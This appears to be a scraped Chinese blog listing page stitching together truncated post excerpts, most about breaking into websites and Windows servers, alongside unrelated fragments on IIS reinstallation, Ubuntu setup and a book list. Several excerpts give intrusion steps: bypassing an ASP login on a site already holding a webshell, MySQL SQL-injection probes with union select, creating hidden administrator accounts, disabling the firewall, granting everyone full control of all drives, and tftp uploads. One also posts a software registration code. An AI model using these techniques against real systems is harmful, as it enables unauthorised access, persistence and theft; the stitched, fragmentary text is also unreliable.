Evonne

前不久拿到一个站webshell

发现里面有个站程序还不错..可密码一直找不到..
看登陆验证代码的时候就想是否可以修改代码..绕过验证访问后台呢..记的以前nowthk教过我..可怜我这个记性啊..给忘了..又请教了下nowthk...

login.asp的验证代码

<% dim user_name,user_password,upwr,uID,ukey,cmd,rs
user_name=trim(request.form("uid"))
user_password=trim(request.form("pwd"))
user_password=jk_md5(user_password,"long")
if user_name=&q...

ISAPI扩展初窥 从CGI说起…

话说CGI(Common Gateway Interface)通用网管接口是一项古老的动态网页交换技术,CGI程序通过对请求信息的解析,可以产生相应的处理,例如它可以在服务器端实现表格处理、数据查询、发送电子邮件等操作,并最终将处理后的信息返回给客户端浏览器,CGI技术可以说是动态网页技术的鼻祖,它在刚出道之际也是风靡一时,至今的许多应用仍然能够看到CGI的身影。然而就像许多技术一样,CGI本身也不可避免的具有一定的缺陷。当你在使用C、C++、甚至Perl语言在服务器端编写完成你的EXE程序并关联到相应请求后,每次的这个请求都会在内存中加载执行你的EXE程序,甚至是某个用户不断的打开同一个页面也是如此,重复的加载执行会消耗大量的内存,当类似这样的并发请求增多时,极容易造成服务器的崩溃。此外一个相对复杂的CGI程序本身的开发...

摘自：http://bavon.bokee.com/2762412.html
要安装Ubuntu Linux，首先需要在硬盘上创建Linux分区，然后才可以将Linux安装进去，最后进行配置。下面具体介绍如何操作。

首先，在硬盘上创建Linux分区

第一步，运行Norton PartitionMagic8.0（华中大在线可以下载）。

第二步，在硬盘分区上选择一个剩余空间大于4G的分区，单击鼠标右键，选择“调整容量/移动”，在弹出的对话框的“自由空间之...

      1、把IIS卸载。

　　2、把 %windir%\system32\inetsrv 删除。

　　3、把%windir%\iisX.log删除，X 是IIS版本。

　　4、把 \inetpub\ 目录删除。

　　（以上操作可以在安全模式中进行。）

　　5、重装IIS。　

问　　题：windows2003重装iis6.0的时候出现“安装程序无法复制文件文件IISApp.vbs”等，重装的时候遇到“安装程序无法复制文件IISApp.vbs”等一系列错误.

分　　析：这就是典型的windows安全数据库出问题了，可以这样来做

参考文章：Windows安全资料库，在%WinDir%\Security\database里。台湾的资料库，大陆称为数据库。在Windows作业系统里带有专门的Esentutl.exe工具，这是一个DOS工具，可用来查看和修复Windows安全资料库。

比如我有一次在安装IIS的元件时，发生了错误：
************************
复制错误 安装程式无法复制档 iisapp.vbs。请确认下面指定的位置是正确的，或...

从后台得到webshell技巧大汇总
作者：9xiao[F.S.T] lin[F.S.T]

 

前 言
　　动网上传漏洞，相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下，现在这种漏洞已经基本比较难见到了，不排除一些小网站仍然存在此漏洞。在拿站过程中，我们经常费了九牛两虎之力拿到管理员帐号和密码，并顺利进入了后台，虽然此时与拿到网站webshell还有一步之遥，但还是有许多新手因想不出合适的方法而被拒之门外。因此，我们把常用的从后台得到webshell的方法进行了总结和归纳，大体情况有以下十大方面。

注意：如何进入后台，不是本文讨论范围，其具体方法就不说了，靠大家去自己发挥。此文参考了前人的多方面的资料和信息，在此一并表示感谢。

一、直接上传获得webshell

信息来源：火狐联盟
作者: cnlnfjhh

今天无聊的时候和 偶们 CN群的 兄弟们检测站点的时候又拣到一个03的鸡
现在win2003的服务器真多 我最近基本见到的web站点全是 2003系统的
对以前 在 2000下 那些克隆的方法来说 用在03上会经常不奏效.
下面就参考以前焦点的 一个文章 加上自己的克隆心得 送给大家. 以下方法对
2003 100%有效!!

当登陆进3389以后--

先建立 cnlnfjhh$ 用户
c:\>net user cnlnfjhh$ wrsky /add
//后面加$ 是为了使在 控制台下用 net user 看不到.

然后运行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCA...

1）如何查看本机所开端口：

用netstat -an命令查看！再stat下面有一些英文，我来简单说一下这些英文具体都代表什么～

LISTEN：侦听来自远方的TCP端口的连接请求

SYN-SENT：再发送连接请求后等待匹配的连接请求

SYN-RECEIVED：再收到和发送一个连接请求后等待对方对连接请求的确认

ESTABLISHED：代表一个打开的连接

FIN-WAIT-1：等待远程TCP连接中断请求，或先前的连接中断请求的确认

FIN-WAIT-2：从远程TCP等待连接中断请求

CLOSE-WAIT：等待从本地用户发来的连接中断请求

CLOSING：等待远程TCP对连接中断的确认

LAST-ACK：等待原来的发向远程TCP的连接中断请求的确认

TIME-...

入侵渗透涉及许多知识和技术，并不是一些人用一两招就可以搞定的。

一，踩点

踩点可以了解目标主机和网络的一些基本的安全信息，主要有；

1，管理员联系信息，电话号，传真号；

2，IP地址范围；

3，DNS服务器；

4，邮件服务器。

相关搜索方法：

1，搜索网页。

  确定目标信息1，为以后发动字典和木马入侵做准备；寻找网页源代码找注释和
隐藏域，寻找隐藏域中的"FORM"标记。例如：

<FORM action=/Poll/poll.asp method=post>

<input type=hidden name=vice value=vice>

</FORM>

橙白
橙
绿白
蓝
蓝白
绿
棕白
棕

1326

绿白
绿
橙白
蓝
蓝白
橙
棕白
棕

1.判断是否存在注入,加';and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本，可以用union查询
3.利用order by 暴字段，在网址后加 order by 10 /* 如果返回正常说明字段大于10
4.再利用union来查询准确字段，如: and 1=2 union select 1,2,3,......./*直到返回正常，说明猜到准确字段数。如过滤了空格可以用/**/代替。
5.判断数据库连接帐号有没有写权限，and (select count(*) from mysql.user)>0 /*如果结果返回错误，那我们只能猜解管理员帐号和密码了。
6.如果返回正常，则可以通过and 1=2 u...

cacls c: /e /t /g everyone:F          把c盘设置为everyone可以浏览
cacls d: /e /t /g everyone:F         把d盘设置为everyone可以浏览
cacls e: /e /t /g everyone:F         把e盘设置为everyone可以浏览
cacls f: /e /t /g everyone:F         把f盘设置为every...

net localgroup administrators oohos /add   将oohos提升为管理员
net user 显示所有用户
net user hacker 123/add   建立一个用户
net stop sharedaccess   停止XP自带防火墙
net user guest /active:yes  激活GUEST用户
net start telnet  开启TELNET服务
net user guest /active:yes  激活GUEST用户
tftp -i 目标IP get 文件名存放地址(目标主机)     TFTP上传命令
ipco...

如果你刚刚学会穷举暴破，一定经常感到奇怪，为什么有些破解者发布的密码就是他的名字？为什么有

些破解者能够发布某个网站的一大堆密码？而当你逐渐熟悉暴力破解之后，也自然会经常碰到这个问题

，那就是－－exploit。
　　到底什么是exploit呀？谁能给我一些exploit list？这个exploit怎么利用呀？......诸如此类的

问题随处可见。诚然，exploit是所有破解者追求的更高境界。能够通过 exploit获得网站的大把密码

，甚至添加具有个人特征的自定义密码，确实是令人羡慕的技巧。但是，如果你公开提出有关exploit

的问题，并不会得到实质性的解答。于是大家开始抱怨，高手们怎么那么吝啬呀，公开一些小秘密又不

会身上少块肉，干嘛...

创建时间：2005-02-20
文章属性：原创
文章提交：sniper (sniperhk_at_163.com)

google hacking的实现以及应用(上)

本文作者:sniper
文章出于:www.4ngel.net
日  期 : 0...

一、 端口
一）、端口的一般含义
说到端口，这确实是个老话题，但一切都是从它开始的，不得不说。何谓端口，打个比方，你住在一座房子里，想让别人来拜访你，得在房子上开个大门，你养了个可爱的小猫，为了它的进出，专门给它修了个小门，为了到后花园，又开了个后门……所有这些为了进到这所房子里而开的门我们叫它端口，这些为了别人进来而开的端口称它为"服务端口"。
你要拜访一个叫张三的人，张三家应该开了个允许你来的门____服务端口，否则将被拒之门外。去时，首先你在家开个"门"，然后通过这个"门"径直走进张三家的大门。为了访问别人而在自己的房子开的"门"，我们称它为"客户端口"。它是随机开的而且是主动打开的，访问完就自行关闭了。它和服务...

准备买一个huado的东西

不知道效果会怎么样

这个是录制视频的软件 很好用 而且压缩的话也不大

http://www.crsky.com/soft/2744.html

Name:crsky
Code:2SXSI-DHM8J-GD4IU-T1Q7F-84LK

作者：许文强（xwq),QQ:57133683　

————只要给我一个注射点，无论什么权限，我都给你一个webshell甚至系统权限

声明：本文仅用于教学目的，如果因为本文造成的攻击后果本人概不负责。因为

发觉其危害过大，原文已经经过大量删减及修改，即使这样本文的危害性仍然很

大，所以请大家不要对国内的站点做任何具有破坏性的操作。


考虑再三，偶还是决定发出来。此招手段歹毒，利用范围广泛，可以说是只要是

有sql注射漏洞的网站，只要运用此法99%可以拿到webshell甚至系统权限（不敢

把话说满，呵呵，经本人数百次真实"实战演习"，基本上是100%可以拿到

webshell甚至系统权限）。
记得我在《...

LABEL[盘符：][卷标名]

文章标题：动易最新未公开Bug
文章作者：WhyTt
漏洞发现时间：2006年10月22日
个人Blog：http://why_tt.mblogger.cn //个人
个人Blog：http://whytt.mblogger.cn  //技术
影响版本：ACCESS和MSSQL

标题：2006年各类优秀技术图片前10
来源：CSD

2006年程序设计语言类Top10 

没了.NET和Java的竞争，C++是理所应当的胜利者，数数，它在十个里面占了八个。  
   
C++ Primer中文版(第4版) 
（美）Stanley B. Lippman Barbara E. Moo Josée LaJoie / 03 1 2006 12:00AM / 人民邮电出版社 / 99元 / 16开 /&n...

我也不是很懂  简单说下

                 有人说网马是骗人的什么不能用的，都错了，只能说卖网马的人是骗子可以，但网马确实可以用。

                       还有 网马不能说是骗人的，确实是好东西，值得看看哦，不要求深入研究

     &nb...

http://auction1.taobao.com/auction/33/item_detail-0db2-846de3915baccc40f60480f3f49b0881.jhtml